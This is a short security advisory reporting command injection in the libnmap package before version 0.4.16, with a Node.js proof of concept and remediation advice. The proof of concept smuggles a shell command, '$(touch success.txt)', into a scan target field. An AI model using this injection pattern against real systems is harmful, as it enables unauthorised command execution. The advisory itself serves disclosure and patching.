Severity: moderate

Command Injection

libnmap

Overview

Versions of libnmap before 0.4.16 are vulnerable to command injection.

Proof of concept

const nmap = require('libnmap');
const opts = {
    range: [
        'scanme.nmap.org',
        "x.x.$(touch success.txt)"
    ]
};
nmap.scan(opts, function(err, report) {
    if (err) throw new Error(err);

    for (let item in report) {
        console.log(JSON.stringify(report[item]));
    }
});

Remediation

Update to version 0.4.16 or later

Advisory timeline

  1. Created

    2018-11-01T14:13:29.913Z
  2. Updated

    2018-11-01T14:13:29.913Z